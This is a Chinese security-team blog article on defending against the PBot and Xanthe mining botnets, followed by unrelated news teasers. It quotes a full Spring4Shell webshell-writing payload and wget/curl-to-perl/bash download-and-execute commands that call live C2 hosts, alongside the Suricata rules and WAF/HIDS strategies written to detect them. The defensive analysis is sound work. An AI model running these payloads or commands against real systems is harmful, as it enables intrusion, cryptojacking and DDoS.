B站安全防御系列僵尸网络
本期作者
曲妍峰
资深安全工程师
01.僵尸网络
僵尸网络 Botnet 是指采用一种或多种传播手段,利用 bot(僵尸程序)病毒感染和控制数万个主机即黑客常说的傀儡机或"肉鸡"(肉机),组织成一个个命令与控制(command and control,C&C)节点。控制僵尸网络的攻击机称为"僵尸主控机(Botmaster)",主控机通过 C&C服务器向 bot发布命令来发送伪造的虚假数据包或是垃圾数据包,达到使攻击目标瘫痪并"拒绝服务"(DDoS)的目的。据公开报道显示,唐山一骇客曾控制了 6万台计算机对某音乐网站进行分布式拒绝服务(DDoS)攻击,造成该网站无法正常提供服务,损失上百万元人民币。
1.1 主要特点
1. 僵尸网络是一个可控制的网络,它具有一定的分布性,随着bot程序的不断传播而不断有新位置的僵尸计算机添加到这个网络中来。
2. 采用了一系列恶意传播手段形成,例如高危漏洞攻击、邮件投送等各种病毒与蠕虫的传播手段,都可以用来进行Botnet的传播,从这个意义上讲,恶意程序bot也是一种病毒或蠕虫。
3. Botnet最主要的特点是可以一对多地执行相同的恶意行为,比如可以同时对某目标网站进行分布式拒绝服务(DDos)攻击,同时发送大量的垃圾邮件等,而正是这种一对多的控制关系,使得攻击者能够以极低的代价高效地控制大量的资源为其服务。
1.2 活跃度统计
利用威胁情报收集手段对僵尸网络活跃情况进行统计分析,从安全社区/论坛、国内外厂商报告、安全研究机构等多处进行情报数据采集,如各僵尸网络的IOC(Indicators of Compromise)情报获取频率、相关报告数量、攻击活动时间等,并结合WAF防护日志研判,分析统计近3个月内活跃情况如下表。安全部门会定期根据活跃僵尸网络排名制定安全防御策略并实施系列防护手段,由于篇幅有限,本文将重点介绍针对近期排名一、二的僵尸网络所采取的防御策略。
02. PBot僵尸网络
2.1 资料背景
PBot僵尸网络家族是近年来异常活跃的P2P僵尸网络,善于利用新漏洞发起攻击,如Spring4Shell漏洞(CVE-2022-22965)、GitLab CE/EE RCE漏洞(CVE-2021-22205)等。因其bot模块为GitHub开源的IRCBot(采用Perl语言编写),且病毒脚本中包含perlbot关键字而得名。据公开资料显示该僵尸网络正通过大量攻击互联网主机植入恶意bot脚本构建僵尸网络来进行挖矿牟利,目前已有上万个受害主机失陷。
2.2 入侵钻石模型
威胁情报分析领域的入侵钻石模型理论可以用于对僵尸网络组织进行分析,该模型基于集合和图论,分类并创建入侵活动模型,模型的基础是一个原子元素("事件"),并由至少四个互连(链接)的特征(节点)组成:技战术手段,基础设施,受害者和影响危害。根据入侵钻石模型理论对PBot僵尸网络家族特征刻画分析及档案建立:攻击技术手段(恶意代码、工具、漏洞):Spring4Shell漏洞(CVE-2022-22965)、GitLab CE/EE RCE漏洞(CVE-2021-22205)利用的网络基础设施(IP、域名、邮箱、URL):主机IP攻击目标特征(行业、地理):互联网行业攻击影响危害(最终目的):挖矿、DDoS
2.3 技术分析
执行流程:攻击者首先利用Spring4Shell(CVE-2022-22965)漏洞、GitLab CE/EE RCE(CVE-2021-22205)漏洞向受影响的脆弱主机植入恶意文件,包含恶意脚本jui.sh、僵尸网络bot模块、lans(下载ssh暴破模块)。恶意脚本jui.sh会下载挖矿shell脚本45.647.txt进行门罗币挖矿并运行僵尸网络bot模块lan构建僵尸网络,恶意脚本lans会从C2(89.44.9.246)下载lan.jpg实现SSH暴破实现横向传播,最终构成挖矿僵尸网络。
2.3.1 Spring4Shell漏洞(CVE-2022-22965)
攻击者利用Spring4Shell(CVE-2022-22965)漏洞向受影响的脆弱主机植入恶意挖矿脚本及bot模块。Spring4Shell 是一个高危远程代码执行 (RCE) 漏洞,影响JDK 9+上运行的所有Spring MVC、Spring WebFlux应用程序。分析Spring4Shell漏洞原理,并结合Pbot利用方式总结请求中存在如下特征:
特殊请求头get_headers = { "prefix": "<%", "suffix": "%>//", # This may seem strange, but this seems to be needed to bypass some check that looks for "Runtime" in the log_pattern "c": "Runtime", }
攻击paylaodclass.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bprefix%7Di%20java.io.InputStream%20in%20%3D%20%25%7Bc%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent. pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell&class.module.cl assLoader.resources.context.parent.pipeline.first.fileDateFormat=
下载并执行僵尸网络bot模块GET /shell.jsp?pwd=k3rwin&cmd=wget -q -O - 89.44.9.246/j|perl HTTP/1.1
检测思路&防护策略 l WAF: Web应用防火墙(Web Application Firewall),通过执行一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供防护的一款安全产品,是B站安全防护体系的第一道防线l NIDS: 网络入侵检测系统(Network Intrusion Detection System),是安全部门基于suricata自主研发的网络入侵检测系统。通过被动地监测网络上传输的原始流量,对获取的网络数据进行处理,从中提取有用的信息,再通过与已知攻击特征相匹配(策略规则配置)来识别攻击事件l IPS: 入侵防御系统(Intrusion Prevention System),检测网络或网络设备间非法流量传输行为的安全防护设备l HIDS: 主机型入侵检测系统(Host-based Intrusion Detection System),作为监视器和分析器,监视主机系统动态的行为以及整个计算机系统的状态
特殊请求头
a) 使用WAF配置安全策略,检测外网存在特殊请求头的request,并实时拦截,策略配置如下:
a) 配置suricata规则,检测产线IDC中存在特殊请求头的request,当发送恶意攻击请求时服务端成功响应后产生告警,对流联动检测规则编写如下:
alert http any any -> any any (msg:"CVE-2022-22965: Spring4Shell远程命令执行漏洞检测&Header"; flow:to_server,established; content:"prefix"; http_header;nocase; content:"%>"; http_header;nocase; content:"suffix"; http_header;nocase;content: "<%";http_header; nocase;flowbit:set,name1; sid:500005; metadata: by custom;) alert http any any <- any any (msg:"CVE-2022-22965: Spring4Shell远程命令执行漏洞检测&Header-Response"; flow:to_client,established; content:"200"; http_stat_code; content:"OK"; http_stat_msg;flowbit:isset,name1;sid:500006; metadata: by custom;)
攻击payload
a) 使用WAF配置安全策略,检测外网存在特殊body的request,并实时拦截,策略配置如下:
配置suricata规则,检测产线IDC中存在特殊请求body的request,当发送恶意攻击请求时服务端成功响应后产生告警,对流联动检测规则编写如下:
alert http any any -> any any (msg:"CVE-2022-22965: Spring4Shell远程命令执行漏洞检测&Request"; flow:to_server,established; content:"prefix"; http_client_body;nocase; content:"suffix"; http_client_body;nocase; content:"getRuntime()"; http_client_body;nocase;content: "class. module.classLoader.resources.context.parent.pipeline.first.pattern ";http_client_body; nocase;pcre:"/%{prefix}is*java.io.InputStreams*ins*=s*%{c}i.getRuntime().exec(request.getParameter(".*?")).getInputStream();/Ri";flowbit:set,name2; sid:500007; metadata: by custom;) alert http any any <- any any (msg:"CVE-2022-22965: Spring4Shell远程命令执行漏洞检测&Body-Response"; flow:to_client,established; content:"200"; http_stat_code; content:"OK"; http_stat_msg;flowbit:isset,name2;sid:500008; metadata: by custom;)
下载并执行僵尸网络bot模块
a) 使用WAF配置安全策略,检测Pbot下载执行僵尸网络bot模块的GET请求,并实时拦截,策略配置如下:
a) 配置suricata规则,检测产线IDC中Pbot下载执行僵尸网络bot模块的GET请求,当发送恶意攻击请求时服务端成功响应后产生告警,对流联动检测规则编写如下:
alert http any any -> any any (msg:" Pbot僵尸网络恶意下载执行检测"; flow:to_server,established; content:"shell.jsp"; http_uri;nocase; content:"cmd=wget"; http_ uri;nocase; content:"89.44.9.246"; http_header;flowbit:set,name3;flowbit:noalert; sid:500009; metadata: by custom;) alert http any any <- any any (msg:" Pbot僵尸网络恶意下载执行检测-Response"; flow:to_client,established; content:"200"; http_stat_code; content:"OK"; http_stat_msg;flowbit:isset,name3;sid:500010; metadata: by custom;)
2.3.2 GitLab CE/EE RCE(CVE-2021-22205)
攻击者利用GitLab CE/EE RCE(CVE-2021-22205)漏洞向受影响的脆弱主机植入恶意挖矿脚本及bot模块。此漏洞由于GitLab 没有正确验证传递给文件解析器的图像文件,导致高危远程代码执行 (RCE)。分析GitLab CE/EE RCE利用方式,并结合Pbot利用方式总结请求中存在如下特征:
获取用户cookie
RCE
使用登陆请求返回的 Cookie 值和 csrf-token 值,利用漏洞接口/uploads/user上传包含恶意代码的图片文件(如下载僵尸网络的bot模块),实现 RCE
检测思路&防护策略
恶意图片上传
a) 使用WAF配置安全策略,检测外网存在Gitlab的/uploads/user接口上传包含恶意命令的图片文件请求,并实时拦截,策略配置如下:
a) 配置suricata规则,检测产线IDC中对Gitlab的/uploads/user接口上传包含恶意命令的图片文件请求,并与Gitlab登陆态获取请求联动检测:
alert http any any -> any any (msg:"Gitlab登陆请求"; flow:to_server,established; content:"GET"; http_method;nocase; content:"/users/sign_in"; http_uri;nocase; flowbit:set,gitlab;flowbit:noalert; sid:500010; metadata: by custom;) alert http any any <- any any (msg:" CVE-2021-22205:Gitlab exiftool 远程命令执行漏洞"; flow:to_server,established; content:"/uploads/user"; nocase; http_uri; fast_pattern; content:"_gitlab_session"; nocase; http_cookie; content:"Copyright"; nocase; http_client_body;flowbit:isset,gitlab;sid:500011; metadata: by custom;)
2.3.3 僵尸网络bot模块下载
利用上述漏洞,可下载并执行以下三种恶意脚本jui.sh、僵尸网络bot模块pp、恶意脚本lans,在流量传输监控中可检测/拦截请求中包含的相关下载命令。
1.恶意脚本jui.sh会下载并运行僵尸网络bot模块lan(使用Perl编写)来构建僵尸网络,并下载挖矿shell脚本45.647.txt进行门罗币挖矿,下载命令如下:wget -q -O - 89.44.9.246/lan|perlcurl -s 89.44.9.246/lan|perlwget -q -O - 89.44.9.246/all/45.647.txt|bashcurl -s 89.44.9.246/all/45.647.txt|bash
2. 僵尸网络bot模块pp是使用Perl编写的DDos攻击模块,下载命令如下:wget -q -O – run.psybnc.org/pp|perlcurl -s run.psybnc.org/pp|perl
3.恶意脚本lans会从C2(89.44.9.246)下载ssh暴破模块lan.jpg(压缩包文件,包含ssh暴破脚本、暴破字典及生成器)来实现内网横向暴破,lans下载命令如下:wget -q -O - 89.44.9.246/lanscurl -s 89.44.9.246/lans
检测思路&防护策略
jui.sh
使用WAF配置安全策略,检测外网存在lan模块下载请求:
b) 配置suricata规则,检测产线IDC中lan模块下载请求:alert http any any -> any any (msg:" Pbot僵尸网络bot模块-lan模块下载检测"; flow:to_client,established; content:"lan"; http_header;nocase; fast_pattern; pcre: "/(wget|curl).*?(89.44.9.246/lan|perl)/Ri"; sid:500020; metadata: by custom;) alert http any any -> any any (msg:" Pbot僵尸网络bot模块-lan模块下载检测"; flow:to_client,established; content:"lan"; http_client_body;nocase; fast_pattern; pcre: "/(wget|curl).*?(89.44.9.246/lan|perl)/Ri"; sid:500021; metadata: by custom;)
c) 使用WAF配置安全策略,检测外网存在shell脚本45.647.txt下载请求:
d) 配置suricata规则,检测产线IDC中shell脚本45.647.txt下载请求:
alert http any any -> any any (msg:" Pbot僵尸网络bot模块-lan模块下载检测"; flow:to_client,established; content:".txt"; http_header;nocase; fast_pattern; pcre: "/(wget|curl).*?(89.44.9.246/all/.*.txt|bash)/Ri"; sid:500022; metadata: by custom;) alert http any any -> any any (msg:" Pbot僵尸网络bot模块-lan模块下载检测"; flow:to_client,established; content:".txt"; http_client_body;nocase; fast_pattern; pcre: "/(wget|curl).*?(89.44.9.246/all/.*.txt|bash)/Ri"; sid:500023; metadata: by custom;)
pp模块
a)使用WAF配置安全策略,检测外网存在pp模块下载请求:
b)配置suricata规则,检测产线IDC中pp模块下载请求
alert http any any -> any any (msg:" Pbot僵尸网络bot模块-pp模块下载检测"; flow:to_client,established; content:"pp"; http_header;nocase; fast_pattern; pcre: "/(wget|curl).*(run.psybnc.org/pp|perl)/Ri"; sid:500024; metadata: by custom;) alert http any any -> any any (msg:" Pbot僵尸网络bot模块-pp模块下载检测"; flow:to_client,established; content:"pp"; http_client_body;nocase; fast_pattern; pcre: "/(wget|curl).*(run.psybnc.org/pp|perl)/Ri"; sid:500025; metadata: by custom;)
c) 根据pp模块功能特点,检测产线IDC中DDos请求,由于规则数量众多,仅列举部分规则:
alert udp any any -> any 53 (msg:"DDos DNS BIND 9 Dynamic Update DoS attempt"; byte_test:1,&,40,2; byte_test:1,>,0,5; byte_test:1,>,0,1; content:"|00 00 06|"; offset:8; content:"|c0 0c 00 ff|"; distance:2; classtype:attempted-dos; sid:500026; metadata:by custom;) alert tcp $EXTERNAL_NET any -> $SMTP_SERVERS 25 (msg:"DDos Excessive SMTP MAIL-FROM DDoS"; flow: to_server, established; content:"MAIL FROM|3a|"; nocase; window: 0; id:0; threshold: type limit, track by_src, count 30, seconds 60; classtype:denial-of-service; sid:500027; rev:2; metadata: by custom;) alert udp $EXTERNAL_NET 123 -> $HOME_NET 123 (msg:"DDos Potential Inbound NTP denial-of-service attempt (repeated mode 7 request)"; dsize:1; content:"|17|"; threshold:type limit, count 1, seconds 60, track by_src; classtype:attempted-dos; sid: 500028; rev:2; metadata: by custom;)
lans模块
a) 使用WAF配置安全策略,检测外网从C2(89.44.9.246)下载ssh暴破模块lans请求:
b) 配置suricata规则,检测产线IDC中从C2(89.44.9.246)下载ssh暴破模块lans请求:
alert http any any -> any any (msg:" Pbot僵尸网络bot模块-pp模块下载检测"; flow:to_client,established; content:"lans"; http_header;nocase; fast_pattern; pcre: "/(wget|curl).*(89.44.9.246/lans)/Ri"; sid:500029; metadata: by custom;) alert http any any -> any any (msg:" Pbot僵尸网络bot模块-pp模块下载检测"; flow:to_client,established; content:"lans"; http_client_body;nocase; fast_pattern; pcre: "/(wget|curl).*(89.44.9.246/lans)/Ri"; sid:500030; metadata: by custom;)
c)根据pp模块功能特点,使用IPS检测ssh横向暴破行为:
03 Xanthe挖矿僵尸网络
3.1 资料背景
多家安全厂商报告显示,一款名为"Xanthe"的僵尸网络近两年正活跃进行挖矿活动,Xanthe是一个加密劫持恶意软件家族,其主要目标是劫持系统资源以挖掘 Monero加密货币。Xanthe采用各种方法在网络中传播,例如收集客户端证书以使用ssh传播到已知主机,或传播到配置错误的Docker API的系统。最新报告显示,Xanthe木马除了继续从事挖矿的"老本行"外,新版本中还添加了投递名为"brickerbotv2"的Mirai僵尸网络bot程序的功能,攻击者可以借此实现对外发起DDoS攻击的目的。
3.2 入侵钻石模型
根据威胁情报分析领域的入侵钻石模型理论,可以从以下角度对PBot僵尸网络家族特征刻画分析及档案建立:攻击技术手段(恶意代码、工具、漏洞):fczyo、alduro、sesa.txt利用的网络基础设施(IP、域名、邮箱、URL):主机IP攻击目标特征(行业、地理):互联网行业攻击影响危害(最终目的):挖矿
3.3 技术分析
Xanthe挖矿僵尸网络的恶意功能分别集成在各个恶意脚本中,主要分为以下3个模块:
http://209.141.34.37/fczyo
http://209.141.34.37/alduro
http://209.141.34.37/sesa.txt
3.3.1 fczyo模块
l qbot()函数:将http://45.61.184.81/x86文件下载到本地并执行,分析代码内容发现,x86文件是基于开源Mirai代码改编的ELF可执行程序,类似网上流行的Mirai僵尸网络样本,具有反调试、单例运行、阻止重启设备等功能,且在运行后会自删除,并通过连接45.61.184.81:81地址来接收主控机下发的DDoS攻击指令,并支持多种DDos攻击类型,包括tcp_syn、tcp_ack、tcp_stomp、udp_dns、udp_plain等
检测思路&防御策略
a) 使用NIDS检测产线流量中的恶意x86文件传输,文件以md5值唯一识别,若发现恶意文件告警则立即上机清理,规则配置如下:
b) 防火墙封禁可以连接DDoS指令的恶意地址45.61.184.81
host函数:分析host函数源码,发现此函数主要目的是将131.153.142.106 pool.hashvault.pro矿池地址写入本地的/etc/host文件
检测思路&防御策略
a)HIDS检测/etc/host文件是否被修改,若修改则产生告警并介入处理,策略配置如下:
b)防火墙直接封禁矿池地址
3.3.3. alduro模块
filegetgo函数:会执行下载http://209.141.34.37/adnckil挖矿程序请求,分析恶意程序发现采用了UPX加壳,脱壳处理后可以看到它是编译于2022.7.13日的开源XMRig矿机6.18.0版本
检测思路&防御策略
a) IPS文件检测adnckil挖矿木马下载,md5值为3932979ca166dc69cca192490318f700,规则配置如下:
b)使用NIDS监测产线流量中可执行文件下载,规则如下:alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"Executable and linking format (ELF) file download Over HTTP"; flow:established; flowbits:isnotset,ET.ELFDownload; file_data; content:"|7F|ELF"; within:4; flowbits:set,ET.ELFDownload; reference:url,www.itee.uq.edu.au/~cristina/students/david/honoursThesis96/bff.htm; reference:url,doc.emergingthreats.net/bin/view/Main/2000418; classtype:policy-violation; sid:2019240; rev:1; metadata:created_at 2022_09_25, updated_at 2022_10_13;)
l sshkeysgo函数:往authorized_keys文件内写入攻击者的SSH公钥,实现免密登录
检测思路&防御策略
a) HIDS定时监控authorized_keys文件文件是否被写入特殊SSH公钥
3.3.3. sesa.txt模块
l sesa.txt模块与fczyo模块存在相同指令,即修改/etc/hosts文件,阻断受害主机上原本存在的安全软件以及竞争对手的网络连接,达到独占网络带宽的目的l 禁用AppArmor,AppArmor是Linux内核的一个安全模块,其允许系统管理员将每个程序与一个安全配置文件关联,可以指定程序可以读、写或运行哪些文件,是否可以打开网络端口等,从而限制程序的功能,达到访问控制的目的。
检测思路&防御策略
a) 同fczyo模块中host函数检测思路相同,使用HIDS监控/etc/hosts文件改动
b) HIDS监测主机是否执行systemctl stop apparmor命令
作者:曲妍峰
来源:微信公众号:哔哩哔哩技术
出处:https://mp.weixin.qq.com/s/X9l4M0RzVJJeNGXmx5TrBw
尿酸高可以吃核桃吗?尿酸高的患者可以食用核桃,但不建议过量食用,每天可以食用2030g,这是为什么呢?今天给大家讲讲对于尿酸高的患者一般建议尿酸高的患者多食用低嘌呤含量的食物,日常生活中常见的干果,包
每天喝二两白酒丨究竟是好是坏?酒,一直是中华文化中浓墨重彩的一笔,但关于酒的争论也一直没有停过。常言道小酌怡情,大醉伤身。很多爱酒人士每顿饭都会喝上一小杯,或一两二两的,但也很少一次喝很多酒,这样喝酒对身体好吗
适量饮酒的益处有人说哥们不喝酒,没有好朋友,这只是自己找借口而已。只要感情深,喝啥都是酒,同样能加强感情,友谊,且聚餐后,不受酒精的困扰,少了老婆孩子的抱怨,吵闹。保持身体的健康,持续了家庭的和
黑料不断皮克曾要夏奇拉只和女性拍视频,并要她采访时闭嘴直播吧10月3日讯据马卡报报道,在皮克和夏奇拉分手后,皮克被认为是出轨的一方,关于两人的往事也被不断挖出。皮克曾要求夏奇拉只能和女性拍视频,并要她闭嘴不在公开场合谈论此事。皮克和夏
太阳队六人得分上双仍难取胜,季前赛遭遇开门黑北京时间10月3日,NBA季前赛太阳坐镇主场迎战澳洲联赛球队阿德莱德36人。最终阿德莱德36人以134124击败太阳,太阳队则是遭遇季前赛开门黑。本场比赛太阳主力全部出战,艾顿首节
中国最大的12条江河,都在哪里,名字是怎么来的?黑龙江中国与俄罗斯的界河,也是我国结冰期最长的河流。它最古老的名字叫黑水。东北是我国著名的黑土地,江水在黑色的河床中流淌,远远望去乌黑一片,故名。又因为乌黑的江水在弯曲的河床中奔流
集团总部在成都赣州澳门的央企央企的集团总部在北京居多,上海雄安武汉次之,还有三家央企集团总部在单独的省和特别行政区。四川成都中国东方电气集团有限公司(名录第33,简称东方电气)江西赣州中国稀土集团有限公司(名
9月安兔兔跑分榜第一!下半年新机又一佳作ROG游戏手机6天玑版文凯尔资讯安兔兔公布了9月安卓旗舰手机性能榜单,第一名好家伙,居然被天玑9000平台的新机ROG游戏手机6天玑版夺得了!想想这个成绩本来就非专业电竞游戏手机莫属,因为游戏手机往往标
华米OV强强联手,手机快充通用,终于不用出门带N根线了大家都在吐槽苹果因为自身的利益一直坚持使用Lightning接口,但事实上,安卓阵营和鸿蒙阵营之间也是一样的操作,虽然大家都是C口,可各手机厂商之间的协议不同,看似可以充电,但只能
前8月国企营收同比增长9。5国有经济运行延续恢复态势经济日报北京10月2日讯(记者曾金华)日前,财政部发布统计数据显示,今年前8个月,全国国有及国有控股企业营业总收入同比保持增长,利润总额降幅较前7月收窄,国有经济运行延续恢复态势。
今天是我抄书的第十五天,收益到3。49了百岁人生中分析了有形资产(金钱房子车)和无形资产(知识和技巧),如果我们的寿命真的达到100岁,这两样还真是必不可少啊。温斯顿丘吉尔说过一句很有哲思的话向前看永远都是明智的,但高瞻
太狗血!韩国美艳名媛坐牢被狂扇巴掌?网友再疯一点夏日炎炎,大家是不是已经开始抱紧空调和冷饮续命了呢?但素!光有这些是不够的,还要有一部爽剧傍身!顶楼3顶楼从开播以来,热度一直高居不下,频频登上热搜榜。而万众期待的第三季也已经安排
放家里3。4年的红茶普洱白茶,还能泡来喝吗?过期茶叶如何处理中国历史悠久,古人发现了很多便于生活的物品有利于身体健康的食物。例如中国非常具有代表性的筷子,外国人想学都难上加难。还有古时文人墨客会友时,不仅要鉴诗,还要品茶。中国人发现了茶,同
菊花的保质期到底有多久?家里长时间搁置的菊花,究竟还能喝吗?菊花茶自古以来就是中国传统的健康茶饮,受到许多人的青睐喜爱,而直到现在,家家户户一年四季也基本都会常备一些菊花,没事都会泡上一杯饮用。入到三伏天后,人体极其容易出汗脱水,经常感觉口
看了刘雪华才知道,自然老去的女人也很优雅,满脸皱纹照样美丽美人迟暮最令人惋惜,尤其是看到那些年轻时容貌惊人的女性因为衰老而泯然众人时,每个女人都会因为年龄增长而焦虑。娱乐圈中不乏这样的例子,不过也有一些女星让我们知道,女人老去之后也可以魅
女性产后要注意不能吃这些东西了产后饮食禁忌忌食寒凉生冷食物产后身体气血亏虚,应多食用温补食物,以利于气血恢复。若产后进食生冷或凉食物,会不利于气血的充实,容易导致脾胃消化吸收功能障碍,并且不利于恶露的排出和淤血
乡村爱情王长贵花式炫富,疑似为带货做准备,网友群魔乱舞这段时间本山传媒接连出事,先是娇娇公开与赵本山作对,后又有很多徒弟相继退出本山传媒,一时间本山传媒热度不断。乡村爱情王长贵花式炫富近日,长篇连续电视剧乡村爱情中王长贵的饰演者王小宝
乡村悲剧的背后幸福到万家观后感幸福到万家一直热度不减,它似乎很贴近生活,有很强的带入感。观众的情绪,一方面被一个个不公事件激怒,另一方面也有一种无奈感,似乎乡村似乎受限于某种无形的力量。王家的几个男人一个比一个
女人的蜕变影视剧中渣得明白的角色回家的诱惑该剧于2011年2月21日在湖南卫视首播,是由上海展杰文化艺术有限公司出品的电视剧,改编自韩剧妻子的诱惑,由秋瓷炫李彩桦凌潇肃迟帅等主演。该片讲述了
乡村振兴看西部重庆永川深挖梨潜力做优果经济央广网重庆7月17日消息(记者刘淳实习生蒋灿)盛夏时节,重庆市永川区南大街街道黄瓜山村的梨园里,一个个又大又圆的梨压弯枝头,呈现出一片喜人的丰收景象。7月14日,在希望的田野上乡村
情感世界!男人不愿娶的女人男人不愿娶的女人男人在选择配偶的时候,内心的感情是非常复杂的,虽然年轻时男人对于感情总是非常冲动,但是一个成熟的男人,在选择配偶的时候,他所考虑的问题要复杂得多,也实际得多,而且一
历史上毫无节操的4位奇女子,每一位,都能刷新很多人的认知历史长河之中,封建社会对当时人们思想的禁锢,我们有目共睹。即便如此,泱泱华夏,上下五千年,风流人物如过江之鲫,数不胜数。这其中,不乏受到封建思想迫害最严重的群体妇女。例如,才华横溢